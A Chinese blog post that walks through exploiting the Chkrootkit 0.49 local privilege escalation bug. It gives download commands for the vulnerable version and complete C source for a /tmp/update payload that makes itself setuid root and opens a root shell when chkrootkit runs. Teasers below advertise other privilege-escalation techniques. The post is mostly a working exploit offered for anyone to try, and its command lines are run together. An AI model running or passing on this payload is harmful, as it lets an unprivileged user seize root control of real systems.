安全漏洞:Chkrootkit 0.49 本地提权漏洞的测试方法

Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:

可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:

wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/

./chkrootkit -V

普通用户在 /tmp 目录下新建 update.c(代码实示例如下):

#include <unistd.h>

void main(void)

{

system("chown root:root /tmp/update");

system("chmod 4755 /tmp/update");

setuid(0);

setgid(0);

execl("/bin/sh","sh",NULL);

}

然后编译好 update ,看下update的文件详情:

执行有漏洞的 chkrootkit :

再来看下 update 已经成功属于 root 组了!

以上就是查看自己 Ckrootkit 0.49 是不是安装的是不是升到最新版了,或者下载有漏洞的版本进行实验的步骤,谢谢阅读,希望能帮到大家,请继续关注,我们会努力分享更多优秀的文章。

(0)

相关推荐

  • Linux>=2.6.39 Mempodipper本地提权分析和EXP利用(CVE-2012-0056)

    Linux>=2.6.39 Mempodipper本地提权分析和EXP利用(CVE-2012-0056) /proc/pid/mem是一个用于读取和写入,直接通过各地寻求与相同的地址作为该进程的 ...

  • linux入侵提权(服务器提权)方法

    利用mysql root提权方法 mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。 ...

  • navicat提权的两个方法(注册表+星号查看器)

    navicat成功提权的两个方法: 1、日志里找密码,navicat会把操作日志保存到My Documents/Navicat/MySQL/logs下的LogHistory.txt,低版本是安装目录下 ...

  • 谷歌公布Windows重大漏洞:允许黑客对本地权限进行升级

    10月末,谷歌安全团队公布了OS X和iOS中的一个发现于9月份的核心漏洞,逼迫苹果推出“紧急更新”进行修补. 现在,谷歌又将炮口对准Windows,该公司提前公布了一个Windows的严重漏洞,此举 ...

  • 超简单U8800手机root提权方法

    这里要说一下,比较简单的有两种root方法,一种是z4,最简单的,会装APK的都会用;但是不能保证百分百成功; 另外一个是下面讲的通过recovery模式,要配合按键选择,并且有E文,优点是通用性强, ...

  • 224.0.0.252 本地链路多播名称解析

    操作方法 01 发现网关防火墙上有很多发送224.0.0.252的数据包,查了一下,是做名称解析用的多播地址. 224.0.0.252    Link-local Multicast Name Res ...

  • 360修复漏洞时卡住了怎么办 360安全卫士漏洞修复安装卡住的解决方法

    360安全卫士漏洞修复安装卡住的解决方法 如下图可以看到,2个补丁中一个修复成功,另一个却一直处于修复中的状态,等待了5分钟以上仍然状态不变,就可以确认是卡死了. 点击[停止修复],确认停止修复漏洞. ...

  • 漏洞挖掘高级方法

    最近看了一篇某外国大佬写的关于漏洞挖掘的文章,讲的挺基础的,然后对自己也有一些帮助,于是抽时间翻译过来,一是自己学习,二是希望能够帮助到一些朋友,翻译水平有限还望见谅,有兴趣可以看原文, 在此文中我将 ...

  • 堵住Microsoft.NET本地权限提升的漏洞风险

    微软的.NET组件爆出严重的溢出漏洞,只要是安装了.NET组件的操作系统都会受到此漏洞的影响。也就是说,我们用得最多的Windows XP、Win7系统,网站服务器用得最多的Windows 2003, ...